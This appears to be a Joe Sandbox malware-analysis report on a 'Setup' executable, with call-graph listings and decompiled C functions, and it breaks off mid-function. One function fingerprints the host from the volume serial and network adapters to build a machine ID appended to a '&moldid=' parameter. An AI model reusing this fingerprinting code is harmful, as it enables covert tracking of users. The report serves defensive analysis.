35261 4f27f2 35262 404820 _Immortalize 76 API calls 35261->35262 35263 4f281d 35262->35263 35279 4d9ef0 35263->35279 35266 4f284f 35296 417430 VariantClear 35266->35296 35267 4f282b 35295 417430 VariantClear 35267->35295 35270->35145 35271->35147 35272->35169 35273->35166 35274->35161 35275->35164 35276->35168 35277->35259 35278->35261 35297 4d63e0 35279->35297 35282 4d9f2d 35322 4227c0 35282->35322 35283 4d9f4e _Immortalize 35286 417910 _Immortalize 77 API calls 35283->35286 35288 4d9f63 35286->35288 35290 4181d0 _Immortalize 77 API calls 35288->35290 35289 4d9f47 35289->35266 35289->35267 35291 4d9f79 35290->35291 35292 4176e0 codecvt 69 API calls 35291->35292 35293 4d9f88 35292->35293 35329 422290 77 API calls _Immortalize 35293->35329 35295->35257 35296->35257 35300 4d6425 35297->35300 35301 4d641b _Immortalize 35297->35301 35298 44f6c8 __putwch_nolock 5 API calls 35299 4d6606 35298->35299 35299->35282 35299->35283 35300->35298 35301->35300 35302 4175c0 _Immortalize 69 API calls 35301->35302 35303 4d6491 _Immortalize 35302->35303 35304 417910 _Immortalize 77 API calls 35303->35304 35319 4d64ad 35304->35319 35305 4d6560 35306 49e7e0 _Immortalize 71 API calls 35305->35306 35307 4d656b 35306->35307 35308 4d65cd 35307->35308 35312 4181d0 _Immortalize 77 API calls 35307->35312 35310 4176e0 codecvt 69 API calls 35308->35310 35309 405260 77 API calls 35309->35319 35311 4d65df 35310->35311 35314 4176e0 codecvt 69 API calls 35311->35314 35318 4d658b 35312->35318 35313 409880 77 API calls 35313->35319 35314->35300 35315 4178c0 codecvt 69 API calls 35315->35319 35316 49e7e0 _Immortalize 71 API calls 35316->35319 35317 417a20 _Immortalize 77 API calls 35317->35318 35318->35308 35318->35317 35330 49e590 35318->35330 35319->35305 35319->35309 35319->35313 35319->35315 35319->35316 35320 49e610 2 API calls 35319->35320 35320->35319 35323 4227ec 35322->35323 35327 422816 35322->35327 35341 4f1500 35323->35341 35326 44fae5 _Immortalize 76 API calls 35326->35327 35328 4cd8f0 150 API calls 2 library calls 35327->35328 35328->35289 35329->35289 35331 49e59e _Immortalize 35330->35331 35334 455218 RemoveDirectoryW 35331->35334 35333 49e5a4 35333->35318 35335 45522a GetLastError 35334->35335 35337 455232 35334->35337 35335->35337 35336 455244 35336->35333 35337->35336 35340 45449d 69 API calls 3 library calls 35337->35340 35339 45523e 35339->35333 35340->35339 35342 4f1533 _Immortalize 35341->35342 35343 44f76f _Allocate 77 API calls 35342->35343 35344 4f1592 35343->35344 35346 4f15aa 35344->35346 35363 4f1000 77 API calls _Immortalize 35344->35363 35347 4098d0 _Immortalize 77 API calls 35346->35347 35348 4f15f8 35347->35348 35349 409810 _Immortalize 77 API calls 35348->35349 35350 4f1614 35349->35350 35351 4178c0 codecvt 69 API calls 35350->35351 35352 4f1620 35351->35352 35353 49e7e0 _Immortalize 71 API calls 35352->35353 35354 4f162b 35353->35354 35355 4f1657 35354->35355 35356 44f76f _Allocate 77 API calls 35354->35356 35358 4176e0 codecvt 69 API calls 35355->35358 35357 4f163f 35356->35357 35357->35355 35364 405010 69 API calls _Immortalize 35357->35364 35359 4f168b 35358->35359 35360 44f6c8 __putwch_nolock 5 API calls 35359->35360 35362 42280c 35360->35362 35362->35326 35363->35346 35364->35355 35366 4d5119 35365->35366 35367 4d5123 35365->35367 35510 41eff0 GetUserDefaultLCID GetUserDefaultUILanguage 35366->35510 35369 4d514b 35367->35369 35500 4246a0 35367->35500 35480 416210 GetParent _DebugHeapAllocator 35369->35480 35374 416a68 SysAllocString 35373->35374 35375 416a5d 35373->35375 35376 416a7f Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 35374->35376 35375->35185 35376->35375 35555 417470 RaiseException _DebugHeapAllocator __CxxThrowException@8 35376->35555 35379 4f2ab3 _Immortalize 35378->35379 35380 4175c0 _Immortalize 69 API calls 35379->35380 35381 4f2abf 35380->35381 35556 4f0440 77 API calls 3 library calls 35381->35556 35383 4f2bf4 35557 404150 69 API calls _Immortalize 35383->35557 35385 4f2ae1 35385->35383 35610 4099f0 77 API calls 35385->35610 35386 4f2bfc 35558 4f19a0 77 API calls 4 library calls 35386->35558 35389 4f2c1f _Immortalize 35390 4175c0 _Immortalize 69 API calls 35389->35390 35395 4f2c3a _Immortalize 35390->35395 35391 4f2bce 35393 4176e0 codecvt 69 API calls 35391->35393 35392 4f2b22 35397 4f2b2c 35392->35397 35611 4099f0 77 API calls 35392->35611 35396 4f2be9 35393->35396 35399 416600 111 API calls 35395->35399 35398 44f6c8 __putwch_nolock 5 API calls 35396->35398 35397->35383 35397->35391 35401 4f30d3 35398->35401 35402 4f2c6f _Immortalize 35399->35402 35400 4f2b6e 35400->35397 35612 4099f0 77 API calls 35400->35612 35401->35203 35559 4162c0 35402->35559 35406 4176e0 codecvt 69 API calls 35407 4f2c9a 35406->35407 35563 4f0440 77 API calls 3 library calls 35407->35563 35409 4f2cb8 35410 4f2cc3 35409->35410 35411 4f2e51 35409->35411 35564 4099f0 77 API calls 35410->35564 35615 4f0440 77 API calls 3 library calls 35411->35615 35413 4f2e6c 35415 4f2ebd 35413->35415 35416 4f2e73 _Immortalize 35413->35416 35616 4f0440 77 API calls 3 library calls 35415->35616 35422 417910 _Immortalize 77 API calls 35416->35422 35418 4f2edb 35420 4f2fb6 35418->35420 35421 4f2ee6 35418->35421 35419 4f2d03 35426 4f2d9a _Immortalize 35419->35426 35427 4f2d59 35419->35427 35423 4176e0 codecvt 69 API calls 35420->35423 35433 409760 77 API calls 35421->35433 35425 4f2e8f 35422->35425 35428 4f2fce 35423->35428 35424 4f2cf9 35424->35419 35613 4099f0 77 API calls 35424->35613 35430 4181d0 _Immortalize 77 API calls 35425->35430 35438 4175c0 _Immortalize 69 API calls 35426->35438 35431 4176e0 codecvt 69 API calls 35427->35431 35619 404e10 69 API calls codecvt 35428->35619 35435 4f2ea2 35430->35435 35432 4f2d71 35431->35432 35614 404e10 69 API calls codecvt 35432->35614 35439 4f2f23 35433->35439 35436 4176e0 codecvt 69 API calls 35435->35436 35441 4f2e4c 35436->35441 35443 4f2db1 35438->35443 35444 409880 77 API calls 35439->35444 35440 4f2fda 35445 4176e0 codecvt 69 API calls 35440->35445 35451 4f2fff 35441->35451 35460 4f3016 35441->35460 35442 4f2d7d 35446 4176e0 codecvt 69 API calls 35442->35446 35565 4f0440 77 API calls 3 library calls 35443->35565 35448 4f2f4b 35444->35448 35445->35396 35446->35396 35450 4178c0 codecvt 69 API calls 35448->35450 35449 4f2dd3 35453 4181d0 _Immortalize 77 API calls 35449->35453 35454 4f2f5a 35450->35454 35620 404fc0 77 API calls _Immortalize 35451->35620 35456 4f2de2 35453->35456 35617 405340 80 API calls _Immortalize 35454->35617 35455 4f3014 35464 4176e0 codecvt 69 API calls 35455->35464 35566 4f24a0 35456->35566 35458 4f2f67 35618 4f0e80 111 API calls 3 library calls 35458->35618 35459 4f305f 35622 404fc0 77 API calls _Immortalize 35459->35622 35460->35459 35621 4067e0 77 API calls _Immortalize 35460->35621 35468 4f309a 35464->35468 35466 4181d0 _Immortalize 77 API calls 35469 4f2e27 35466->35469 35467 4f2f80 35470 4181d0 _Immortalize 77 API calls 35467->35470 35623 404e10 69 API calls codecvt 35468->35623 35473 4176e0 codecvt 69 API calls 35469->35473 35474 4f2fa5 35470->35474 35477 4f2e36 35473->35477 35478 4176e0 codecvt 69 API calls 35474->35478 35475 4f30a6 35476 4176e0 codecvt 69 API calls 35475->35476 35476->35396 35479 4176e0 codecvt 69 API calls 35477->35479 35478->35441 35479->35441 35480->35189 35481->35205 35482->35212 35483->35219 35484->35224 35485->35206 35486->35229 35487->35241 35488->35178 35489->35244 35490->35246 35491->35250 35492->35197 35493->35213 35494->35194 35495->35176 35496->35220 35497->35210 35498->35188 35499->35177 35501 4246b0 35500->35501 35512 424630 35501->35512 35503 4246cd 35509 4246d4 35503->35509 35518 424570 35503->35518 35508 4245c0 22 API calls 35508->35509 35511 49bcd0 77 API calls _Immortalize 35509->35511 35510->35367 35511->35369 35513 424640 35512->35513 35514 42465a IsValidCodePage 35513->35514 35517 42464a 35513->35517 35515 424669 35514->35515 35514->35517 35527 4244c0 7 API calls 35515->35527 35517->35503 35519 424580 DeleteObject 35518->35519 35520 424597 35518->35520 35519->35520 35521 4245a0 DeleteObject 35520->35521 35522 4245b7 35520->35522 35521->35522 35523 4245c0 35522->35523 35524 4245d4 35523->35524 35528 424280 GetDC 35524->35528 35527->35517 35529 4242f4 35528->35529 35530 424398 GetDeviceCaps MulDiv 35529->35530 35531 4243be MulDiv 35529->35531 35533 4243d7 35529->35533 35530->35533 35531->35533 35532 424436 35534 424463 _wcscpy 35532->35534 35535 42443c GetDeviceCaps MulDiv 35532->35535 35533->35532 35540 424140 35533->35540 35537 424479 ReleaseDC 35534->35537 35535->35534 35538 44f6c8 __putwch_nolock 5 API calls 35537->35538 35539 424492 35538->35539 35539->35508 35541 424156 35540->35541 35542 42415e GetDC 35540->35542 35543 424169 CreateFontW SelectObject GetTextFaceW 35541->35543 35542->35543 35544 4241c6 35543->35544 35545 4241cf GetTextCharset 35543->35545 35546 4241f6 SelectObject 35544->35546 35547 4241e8 GetTextMetricsW 35544->35547 35545->35544 35548 42420a ReleaseDC 35546->35548 35550 424216 35546->35550 35547->35546 35548->35550 35549 42423b DeleteObject 35552 42424e _wcscpy 35549->35552 35550->35549 35551 424229 StrStrIW 35550->35551 35550->35552 35551->35549 35551->35552 35553 44f6c8 __putwch_nolock 5 API calls 35552->35553 35554 424271 35553->35554 35554->35533 35555->35375 35556->35385 35557->35386 35558->35389 35561 416308 35559->35561 35560 41631a 35560->35406 35561->35560 35624 4bf560 35561->35624 35563->35409 35564->35424 35565->35449 35567 4f24e3 _Immortalize 35566->35567 35568 4175c0 _Immortalize 69 API calls 35567->35568 35569 4f24ec _Immortalize 35568->35569 35570 4175c0 _Immortalize 69 API calls 35569->35570 35571 4f2504 35570->35571 35650 4d6ea0 35571->35650 35574 409760 77 API calls 35575 4f2551 35574->35575 35576 405120 77 API calls 35575->35576 35577 4f2579 35576->35577 35578 4178c0 codecvt 69 API calls 35577->35578 35579 4f2585 _Immortalize 35578->35579 35580 4f2604 35579->35580 35582 409760 77 API calls 35579->35582 35581 416600 111 API calls 35580->35581 35583 4f2624 35581->35583 35584 4f25cd 35582->35584 35587 405120 77 API calls 35583->35587 35585 405120 77 API calls 35584->35585 35586 4f25f5 35585->35586 35588 4178c0 codecvt 69 API calls 35586->35588 35589 4f2655 35587->35589 35588->35580 35590 4fdb00 111 API calls 35589->35590 35591 4f2661 35590->35591 35592 4181d0 _Immortalize 77 API calls 35591->35592 35593 4f2689 35592->35593 35594 4176e0 codecvt 69 API calls 35593->35594 35595 4f2698 _Immortalize 35594->35595 35596 4f2715 35595->35596 35599 409760 77 API calls 35595->35599 35597 417660 allocator 77 API calls 35596->35597 35598 4f2721 35597->35598 35600 4176e0 codecvt 69 API calls 35598->35600 35601 4f26de 35599->35601 35602 4f273c 35600->35602 35604 405120 77 API calls 35601->35604 35603 4176e0 codecvt 69 API calls 35602->35603 35605 4f2748 35603->35605 35606 4f2706 35604->35606 35607 44f6c8 __putwch_nolock 5 API calls 35605->35607 35608 4178c0 codecvt 69 API calls 35606->35608 35609 4f2760 35607->35609 35608->35596 35609->35466 35610->35392 35611->35400 35612->35397 35613->35419 35614->35442 35615->35413 35616->35418 35617->35458 35618->35467 35619->35440 35620->35455 35621->35459 35622->35455 35623->35475 35627 4c0dc0 35624->35627 35628 4c0dec 35627->35628 35632 4bf568 35627->35632 35633 4c0300 35628->35633 35631 44fae5 _Immortalize 76 API calls 35631->35632 35632->35560 35634 4c0330 _Immortalize 35633->35634 35645 49f690 35634->35645 35636 4c0346 _Immortalize 35637 4175c0 _Immortalize 69 API calls 35636->35637 35638 4c0382 _Immortalize 35637->35638 35639 4175c0 _Immortalize 69 API calls 35638->35639 35640 4c039d InitializeCriticalSectionAndSpinCount 35639->35640 35642 4c0405 35640->35642 35643 4c03fb 35640->35643 35642->35631 35649 4c2160 113 API calls 6 library calls 35643->35649 35646 49f6c9 _Immortalize 35645->35646 35647 4175c0 _Immortalize 69 API calls 35646->35647 35648 49f6d5 35647->35648 35648->35636 35649->35642 35651 4d6ed6 _Immortalize 35650->35651 35652 4175c0 _Immortalize 69 API calls 35651->35652 35653 4d6edf 35652->35653 35654 495d00 80 API calls 35653->35654 35655 4d6ef5 35654->35655 35656 4130d0 _Immortalize 77 API calls 35655->35656 35657 4d6f05 35656->35657 35658 49e7e0 _Immortalize 71 API calls 35657->35658 35660 4d6f1d _memset _Immortalize 35658->35660 35659 4d6fe2 _Immortalize 35661 417910 _Immortalize 77 API calls 35659->35661 35660->35659 35662 4d6f56 GetPrivateProfileStringW 35660->35662 35663 4d6ffd 35661->35663 35662->35659 35665 4d6f7a _Immortalize 35662->35665 35664 4181d0 _Immortalize 77 API calls 35663->35664 35666 4d7010 35664->35666 35668 417910 _Immortalize 77 API calls 35665->35668 35667 4176e0 codecvt 69 API calls 35666->35667 35669 4d701f _Immortalize 35667->35669 35670 4d6f98 35668->35670 35673 4176e0 codecvt 69 API calls 35669->35673 35671 4181d0 _Immortalize 77 API calls 35670->35671 35672 4d6fab 35671->35672 35674 4176e0 codecvt 69 API calls 35672->35674 35675 4d6fda 35673->35675 35676 4d6fba _Immortalize 35674->35676 35677 44f6c8 __putwch_nolock 5 API calls 35675->35677 35679 4176e0 codecvt 69 API calls 35676->35679 35678 4d705a 35677->35678 35678->35574 35679->35675 32709 422580 RegCreateKeyExW 32710 4225c1 32709->32710 32711 4225d7 32710->32711 32712 41ef10 RegCloseKey 32710->32712 32712->32711 33028 4cd380 33029 4cd38f LoadIconW 33028->33029 33030 4cd3a3 33028->33030 33031 4cd3aa 33029->33031 33033 4d5a80 33030->33033 33034 4d5ab8 33033->33034 33035 4098d0 _Immortalize 77 API calls 33034->33035 33036 4d5ade 33035->33036 33037 409810 _Immortalize 77 API calls 33036->33037 33038 4d5afd 33037->33038 33039 4178c0 codecvt 69 API calls 33038->33039 33040 4d5b09 33039->33040 33041 49e7e0 _Immortalize 71 API calls 33040->33041 33044 4d5b14 _Immortalize 33041->33044 33042 4d5b43 33043 4d5b5f IsWindow 33042->33043 33047 4d5b55 LoadIconW 33042->33047 33045 4d5b6d SendMessageW SendMessageW 33043->33045 33046 4d5b97 33043->33046 33044->33042 33049 4d5b39 LoadImageW 33044->33049 33045->33046 33048 4176e0 codecvt 69 API calls 33046->33048 33047->33043 33050 4d5bac 33048->33050 33049->33042 33051 44f6c8 __putwch_nolock 5 API calls 33050->33051 33052 4d5bc4 33051->33052 33052->33031 35730 4251b0 35731 4251d5 35730->35731 35732 4251dc _wcscpy 35730->35732 35733 44f6c8 __putwch_nolock 5 API calls 35731->35733 35734 4251ec PathFindFileNameW 35732->35734 35736 425279 35733->35736 35739 4250e0 LoadLibraryW 35734->35739 35738 4250e0 6 API calls 35738->35731 35740 42513b 35739->35740 35741 425108 GetProcAddress 35739->35741 35742 425188 LoadLibraryW 35740->35742 35745 425166 35740->35745 35746 425147 GetCurrentDirectoryW SetCurrentDirectoryW 35740->35746 35743 425120 35741->35743 35744 425131 FreeLibrary 35741->35744 35742->35738 35743->35744 35744->35740 35745->35742 35747 425171 SetCurrentDirectoryW 35745->35747 35746->35742 35747->35742 35761 423bb0 35764 423b50 35761->35764 35763 423bbf codecvt 35765 4176e0 codecvt 69 API calls 35764->35765 35766 423b9b 35765->35766 35766->35763

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 004F4BC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 130COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E004F4BC0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				WCHAR* _v8;
				char _v16;
				signed int _v20;
				char _v36;
				int _v40;
				char _v44;
				long _v48;
				intOrPtr _v6128;
				char _v6528;
				char _v7046;
				char _v7048;
				intOrPtr _v7052;
				WCHAR* _v7056;
				intOrPtr _v7060;
				char _v7092;
				char _v7093;
				intOrPtr _v7100;
				signed int _t54;
				signed int _t55;
				int _t59;
				char* _t62;
				void* _t65;
				void* _t71;
				void* _t77;
				void* _t111;
				signed int _t112;

				_t111 = __esi;
				_t110 = __edi;
				_t77 = __ebx;
				_push(0xffffffff);
				_push(0x507eec);
				_push( *[fs:0x0]);
				E0045D8E0(0x1bac);
				_t54 =  *0x561244; // 0xddd124f9
				_t55 = _t54 ^ _t112;
				_v20 = _t55;
				_push(_t55);
				 *[fs:0x0] =  &_v16;
				_v7100 = __ecx;
				E00451D90(__edi,  &_v36, 0, 0x10);
				_v48 = 0;
				_t59 = GetVolumeInformationW(L"C:\\", 0, 0,  &_v48, 0, 0, 0, 0); // executed
				_v40 = _t59;
				_v36 = _v48;
				_v44 = 0x1950;
				E00451D90(_t110,  &_v6528, 0, _v44);
				_push( &_v44);
				_t62 =  &_v6528;
				_push(_t62); // executed
				L0044F17E(); // executed
				if(_t62 == 0) {
					_v7052 = _v6128;
					_v7056 = 0;
					while(_v7056 < _v7052) {
						 *((char*)(_t112 + _v7056 - 0x16)) =  *((intOrPtr*)(_t112 + _v7056 - 0x17e8));
						_v7056 =  &(_v7056[0]);
					}
				}
				_v7048 = 0;
				E00451D90(_t110,  &_v7046, 0, 0x206);
				__imp__StringFromGUID2( &_v36,  &_v7048, 0x104);
				_t65 = E00434050( &_v7093);
				_t106 =  &_v7048;
				E00417910( &_v7048, _t65);
				_v8 = 0;
				E004181D0(_v7100 + 4,  &_v7092);
				_v8 = 0xffffffff;
				E004176E0();
				_v7060 = E004259F0(_v7100 + 8, __eflags, L"{-}", 0);
				while(1) {
					__eflags = _v7060 - 0xffffffff;
					if(_v7060 == 0xffffffff) {
						break;
					}
					_t106 = _v7060;
					E00417A20(_t77, _v7100 + 8, _t110, _t111, _v7060, 1);
					__eflags = _v7100 + 8;
					_v7060 = E004259F0(_v7100 + 8, _v7100 + 8, L"{-}", _v7060);
				}
				_t71 = E0041A3D0(_v7100 + 4);
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t112;
				return E0044F6C8(_t71, _t77, _v20 ^ _t112, _t106, _t110, _t111);
			}





























                                                                                                                                                              0x004f4bc0
                                                                                                                                                              0x004f4bc0
                                                                                                                                                              0x004f4bc0
                                                                                                                                                              0x004f4bc3
                                                                                                                                                              0x004f4bc5
                                                                                                                                                              0x004f4bd0
                                                                                                                                                              0x004f4bd6
                                                                                                                                                              0x004f4bdb
                                                                                                                                                              0x004f4be0
                                                                                                                                                              0x004f4be2
                                                                                                                                                              0x004f4be5
                                                                                                                                                              0x004f4be9
                                                                                                                                                              0x004f4bef
                                                                                                                                                              0x004f4bfd
                                                                                                                                                              0x004f4c05
                                                                                                                                                              0x004f4c21
                                                                                                                                                              0x004f4c27
                                                                                                                                                              0x004f4c2d
                                                                                                                                                              0x004f4c30
                                                                                                                                                              0x004f4c44
                                                                                                                                                              0x004f4c4f
                                                                                                                                                              0x004f4c50
                                                                                                                                                              0x004f4c56
                                                                                                                                                              0x004f4c57
                                                                                                                                                              0x004f4c5e
                                                                                                                                                              0x004f4c66
                                                                                                                                                              0x004f4c6c
                                                                                                                                                              0x004f4c87
                                                                                                                                                              0x004f4ca8
                                                                                                                                                              0x004f4c81
                                                                                                                                                              0x004f4c81
                                                                                                                                                              0x004f4c87
                                                                                                                                                              0x004f4cb0
                                                                                                                                                              0x004f4cc5
                                                                                                                                                              0x004f4cdd
                                                                                                                                                              0x004f4ce9
                                                                                                                                                              0x004f4cef
                                                                                                                                                              0x004f4cfc
                                                                                                                                                              0x004f4d01
                                                                                                                                                              0x004f4d18
                                                                                                                                                              0x004f4d1d
                                                                                                                                                              0x004f4d2a
                                                                                                                                                              0x004f4d44
                                                                                                                                                              0x004f4d6c
                                                                                                                                                              0x004f4d6c
                                                                                                                                                              0x004f4d73
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f4d77
                                                                                                                                                              0x004f4d87
                                                                                                                                                              0x004f4d5e
                                                                                                                                                              0x004f4d66
                                                                                                                                                              0x004f4d66
                                                                                                                                                              0x004f4d97
                                                                                                                                                              0x004f4d9f
                                                                                                                                                              0x004f4daa
                                                                                                                                                              0x004f4db4

                                                                                                                                                              APIs
                                                                                                                                                              • _memset.LIBCMT ref: 004F4BFD
                                                                                                                                                              • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004F4C21
                                                                                                                                                              • _memset.LIBCMT ref: 004F4C44
                                                                                                                                                              • GetAdaptersInfo.IPHLPAPI(?,?), ref: 004F4C57
                                                                                                                                                              • _memset.LIBCMT ref: 004F4CC5
                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000104,?,?,?,?,?,?,&moldid=,00000000,?,?,?,?,?), ref: 004F4CDD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memset$AdaptersFromInfoInformationStringVolume
                                                                                                                                                              • String ID: C:\${-}${-}
                                                                                                                                                              • API String ID: 3941708474-2681429196
                                                                                                                                                              • Opcode ID: 16b8df58f7d386e11392ccd5ae140c1c489cdaaa900356e08ee5eeba1650c5df
                                                                                                                                                              • Instruction ID: 2c91b6d981af4eadff72b74c93defabb846fcc535acab3a6063feb5631383c31
                                                                                                                                                              • Opcode Fuzzy Hash: 16b8df58f7d386e11392ccd5ae140c1c489cdaaa900356e08ee5eeba1650c5df
                                                                                                                                                              • Instruction Fuzzy Hash: 1A5170749042189BDB24DF94CC51BEEB778AF48714F1042DEE609A72C1EB746A84CF68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0049D9C0 Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E0049D9C0(int __edx, long _a4) {
				int _v8;
				void* _v12;
				signed int _v16;
				int _v556;
				intOrPtr _v572;
				void* _v580;
				signed int _v581;
				int _v588;
				signed int _t28;
				void* _t30;
				int _t34;
				int _t39;
				intOrPtr _t41;
				intOrPtr _t49;
				intOrPtr _t50;
				signed int _t51;

				_t47 = __edx;
				_t28 =  *0x561244; // 0xddd124f9
				_v16 = _t28 ^ _t51;
				_v8 = 0;
				_t30 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t30;
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					if(_a4 == 0) {
						_a4 = GetCurrentProcessId();
					}
					_push( &_v580);
					_t34 = Process32FirstW(_v12); // executed
					_v581 = _t47;
					while((_v581 & 0x000000ff) != 0) {
						if(_v572 == _a4) {
							_v8 = _v556;
						}
						if(_v8 != 0) {
							L10:
							_v588 = 0;
						} else {
							_t39 = Process32NextW(_v12,  &_v580); // executed
							if(_t39 == 0) {
								goto L10;
							} else {
								_v588 = 1;
							}
						}
						_t47 = _v588;
						_v581 = _v588;
					}
					FindCloseChangeNotification(_v12); // executed
				}
				return E0044F6C8(_v8, _t41, _v16 ^ _t51, _t47, _t49, _t50);
			}



















                                                                                                                                                              0x0049d9c0
                                                                                                                                                              0x0049d9c9
                                                                                                                                                              0x0049d9d0
                                                                                                                                                              0x0049d9d3
                                                                                                                                                              0x0049d9de
                                                                                                                                                              0x0049d9e3
                                                                                                                                                              0x0049d9ea
                                                                                                                                                              0x0049d9f0
                                                                                                                                                              0x0049d9fe
                                                                                                                                                              0x0049da06
                                                                                                                                                              0x0049da06
                                                                                                                                                              0x0049da0f
                                                                                                                                                              0x0049da14
                                                                                                                                                              0x0049da1e
                                                                                                                                                              0x0049da24
                                                                                                                                                              0x0049da38
                                                                                                                                                              0x0049da40
                                                                                                                                                              0x0049da40
                                                                                                                                                              0x0049da47
                                                                                                                                                              0x0049da69
                                                                                                                                                              0x0049da69
                                                                                                                                                              0x0049da49
                                                                                                                                                              0x0049da54
                                                                                                                                                              0x0049da5b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049da5d
                                                                                                                                                              0x0049da5d
                                                                                                                                                              0x0049da5d
                                                                                                                                                              0x0049da5b
                                                                                                                                                              0x0049da73
                                                                                                                                                              0x0049da79
                                                                                                                                                              0x0049da79
                                                                                                                                                              0x0049da85
                                                                                                                                                              0x0049da85
                                                                                                                                                              0x0049da9b

                                                                                                                                                              APIs
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0049D9DE
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0049DA00
                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0049DA14
                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0049DA54
                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 0049DA85
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process32$ChangeCloseCreateCurrentFindFirstNextNotificationProcessSnapshotToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1594840063-0
                                                                                                                                                              • Opcode ID: d861248f22b9e8738e682d16beab98e63d0608105bc6e0e536ca83f65de22f70
                                                                                                                                                              • Instruction ID: 2ab5695731c723cb54ced3e96b23633eb8c252716f13112e9c65ba2f165a2eb0
                                                                                                                                                              • Opcode Fuzzy Hash: d861248f22b9e8738e682d16beab98e63d0608105bc6e0e536ca83f65de22f70
                                                                                                                                                              • Instruction Fuzzy Hash: C3211D70D04218EBDF20DFA5C8887EDBBB4AF14304F1441EAE409A7290DB789AD8CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0049F0E0 Relevance: 3.2, APIs: 2, Instructions: 164fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E0049F0E0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v52;
				signed int _v53;
				intOrPtr _v60;
				char _v92;
				void* _v96;
				struct _WIN32_FIND_DATAW _v688;
				char _v689;
				char _v690;
				char _v724;
				char _v725;
				char _v756;
				void* _v788;
				char _v789;
				char _v820;
				char _v821;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				char _v848;
				char _v852;
				signed int _v856;
				signed int _v860;
				signed int _t84;
				signed int _t85;
				void* _t97;
				signed int _t100;
				signed int _t110;
				intOrPtr _t125;
				signed int _t171;
				intOrPtr _t173;
				intOrPtr _t174;
				signed int _t175;
				void* _t176;
				void* _t177;

				_t174 = __esi;
				_t173 = __edi;
				_t125 = __ebx;
				_push(0xffffffff);
				_push(0x50b34f);
				_push( *[fs:0x0]);
				_t177 = _t176 - 0x34c;
				_t84 =  *0x561244; // 0xddd124f9
				_t85 = _t84 ^ _t175;
				_v20 = _t85;
				_push(_t85);
				 *[fs:0x0] =  &_v16;
				E004175C0(E00434050( &_v689));
				_v8 = 0;
				E004175C0(E00434050( &_v690));
				_v8 = 1;
